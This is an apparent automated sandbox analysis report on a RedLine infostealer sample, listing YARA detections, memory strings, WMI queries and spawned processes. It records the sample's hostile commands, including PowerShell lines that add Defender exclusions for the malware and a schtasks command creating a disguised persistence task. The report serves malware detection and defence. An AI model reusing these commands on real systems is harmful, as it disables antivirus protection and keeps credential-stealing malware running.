Source: 11.2.ECcZgk.exe.37d8e18.4.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.l2rMtmFkD6.exe.3a68630.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.l2rMtmFkD6.exe.3a68630.3.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.ECcZgk.exe.37f0c38.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 11.2.ECcZgk.exe.37f0c38.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.ECcZgk.exe.37d8e18.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 11.2.ECcZgk.exe.37d8e18.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.l2rMtmFkD6.exe.3a80450.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.l2rMtmFkD6.exe.3a80450.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.l2rMtmFkD6.exe.3a68630.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.l2rMtmFkD6.exe.3a68630.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: l2rMtmFkD6.exe PID: 6156, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: l2rMtmFkD6.exe PID: 3524, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: ECcZgk.exe PID: 1848, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Detected potential crypto function
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_00CBDF4C 0_2_00CBDF4C
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C4E049 0_2_05C4E049
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C45249 0_2_05C45249
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C48688 0_2_05C48688
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C48250 0_2_05C48250
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C49D60 0_2_05C49D60
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C47E17 0_2_05C47E17
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C47E18 0_2_05C47E18
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C48AC0 0_2_05C48AC0
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_090E0BF0 0_2_090E0BF0
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 8_2_014DE7B0 8_2_014DE7B0
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 8_2_014DDC90 8_2_014DDC90
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 8_2_06969630 8_2_06969630
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 8_2_06963720 8_2_06963720
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 8_2_06964468 8_2_06964468
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 8_2_0696D528 8_2_0696D528
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 8_2_06961210 8_2_06961210
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 8_2_0696DA30 8_2_0696DA30
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 11_2_0259DF4C 11_2_0259DF4C
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 11_2_04CC77F8 11_2_04CC77F8
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 11_2_04CC0040 11_2_04CC0040
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 11_2_04CC0007 11_2_04CC0007
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 11_2_05D1D2EB 11_2_05D1D2EB
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 11_2_05D1524B 11_2_05D1524B
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 11_2_05D18688 11_2_05D18688
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 11_2_05D18250 11_2_05D18250
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 11_2_05D19D60 11_2_05D19D60
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 11_2_05D17E18 11_2_05D17E18
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 11_2_05D18AC0 11_2_05D18AC0
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 14_2_0300E7B0 14_2_0300E7B0
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 14_2_0300DC90 14_2_0300DC90
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 14_2_06AC9630 14_2_06AC9630
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 14_2_06AC3720 14_2_06AC3720
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 14_2_06AC4468 14_2_06AC4468
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 14_2_06AC1210 14_2_06AC1210
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 14_2_06ACDA30 14_2_06ACDA30
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 14_2_06ACD140 14_2_06ACD140
PE / OLE file has an invalid certificate
Source: l2rMtmFkD6.exe Static PE information: invalid certificate
Sample file is different than original file name gathered from version info
Source: l2rMtmFkD6.exe, 00000000.00000002.2098275898.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs l2rMtmFkD6.exe
Source: l2rMtmFkD6.exe, 00000000.00000002.2102080907.0000000005A70000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs l2rMtmFkD6.exe
Source: l2rMtmFkD6.exe, 00000000.00000002.2099262418.00000000029A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs l2rMtmFkD6.exe
Source: l2rMtmFkD6.exe, 00000000.00000002.2103869192.0000000005F90000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs l2rMtmFkD6.exe
Source: l2rMtmFkD6.exe, 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameImplosions.exe4 vs l2rMtmFkD6.exe
Source: l2rMtmFkD6.exe, 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs l2rMtmFkD6.exe
Source: l2rMtmFkD6.exe, 00000000.00000000.2009996260.00000000005C2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamefwvZ.exe8 vs l2rMtmFkD6.exe
Source: l2rMtmFkD6.exe, 00000000.00000002.2099262418.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameImplosions.exe4 vs l2rMtmFkD6.exe
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefirefox.exe0 vs l2rMtmFkD6.exe
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs l2rMtmFkD6.exe
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]q,\\StringFileInfo\\000004B0\\OriginalFilename vs l2rMtmFkD6.exe
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamechrome.exe< vs l2rMtmFkD6.exe
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]q,\\StringFileInfo\\040904B0\\OriginalFilename vs l2rMtmFkD6.exe
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs l2rMtmFkD6.exe
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameIEXPLORE.EXED vs l2rMtmFkD6.exe
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]q,\\StringFileInfo\\080904B0\\OriginalFilename vs l2rMtmFkD6.exe
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsedge.exe> vs l2rMtmFkD6.exe
Source: l2rMtmFkD6.exe, 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameImplosions.exe4 vs l2rMtmFkD6.exe
Source: l2rMtmFkD6.exe Binary or memory string: OriginalFilenamefwvZ.exe8 vs l2rMtmFkD6.exe
Uses 32bit PE files
Source: l2rMtmFkD6.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 11.2.ECcZgk.exe.37f0c38.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 11.2.ECcZgk.exe.37f0c38.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.l2rMtmFkD6.exe.3a80450.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.l2rMtmFkD6.exe.3a80450.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.2.l2rMtmFkD6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 8.2.l2rMtmFkD6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.ECcZgk.exe.37d8e18.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 11.2.ECcZgk.exe.37d8e18.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.l2rMtmFkD6.exe.3a68630.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.l2rMtmFkD6.exe.3a68630.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.ECcZgk.exe.37f0c38.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 11.2.ECcZgk.exe.37f0c38.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.ECcZgk.exe.37d8e18.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 11.2.ECcZgk.exe.37d8e18.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.l2rMtmFkD6.exe.3a80450.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.l2rMtmFkD6.exe.3a80450.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.l2rMtmFkD6.exe.3a68630.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.l2rMtmFkD6.exe.3a68630.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: l2rMtmFkD6.exe PID: 6156, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: l2rMtmFkD6.exe PID: 3524, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: ECcZgk.exe PID: 1848, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: l2rMtmFkD6.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ECcZgk.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, cekC21ULw7jnXCJgV1.cs Security API names: _0020.SetAccessControl
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, cekC21ULw7jnXCJgV1.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, cekC21ULw7jnXCJgV1.cs Security API names: _0020.AddAccessRule
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, EHDhQ9fEEtfuXrOd2d.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, EHDhQ9fEEtfuXrOd2d.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, cekC21ULw7jnXCJgV1.cs Security API names: _0020.SetAccessControl
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, cekC21ULw7jnXCJgV1.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, cekC21ULw7jnXCJgV1.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@21/107@1/1
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe File created: C:\Users\user\AppData\Roaming\ECcZgk.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6968:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3648:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4028:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Mutant created: \Sessions\1\BaseNamedObjects\fwEkEExcrfONGRJ
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1292:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3208:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe File created: C:\Users\user\AppData\Local\Temp\tmp5831.tmp Jump to behavior
Source: l2rMtmFkD6.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: l2rMtmFkD6.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: l2rMtmFkD6.exe, 00000000.00000000.2009996260.00000000005C2000.00000002.00000001.01000000.00000003.sdmp, ECcZgk.exe.0.dr Binary or memory string: INSERT INTO [dbo].[Lists] ([Name]) VALUES (@Name);
Source: ECcZgk.exe, 0000000E.00000002.2334589436.000000000728F000.00000004.00000020.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003577000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2334589436.00000000072A4000.00000004.00000020.00020000.00000000.sdmp, tmp945C.tmp.14.dr, tmp1591.tmp.14.dr, tmp88C7.tmp.8.dr, tmp156F.tmp.14.dr, tmp949D.tmp.14.dr, tmp15A2.tmp.14.dr, tmp8928.tmp.8.dr, tmp943C.tmp.14.dr, tmp6EA6.tmp.8.dr, tmp6EB9.tmp.8.dr, tmp1590.tmp.14.dr, tmp157F.tmp.14.dr, tmp8929.tmp.8.dr, tmp8908.tmp.8.dr, tmp8907.tmp.8.dr, tmpCC96.tmp.14.dr, tmp6EA7.tmp.8.dr, tmp6EB8.tmp.8.dr, tmp6E96.tmp.8.dr, tmp15B2.tmp.14.dr, tmp88A7.tmp.8.dr, tmp6E95.tmp.8.dr, tmp946D.tmp.14.dr, tmp5BB6.tmp.14.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe File read: C:\Users\user\Desktop\l2rMtmFkD6.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\l2rMtmFkD6.exe "C:\Users\user\Desktop\l2rMtmFkD6.exe"
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\l2rMtmFkD6.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECcZgk.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp5831.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
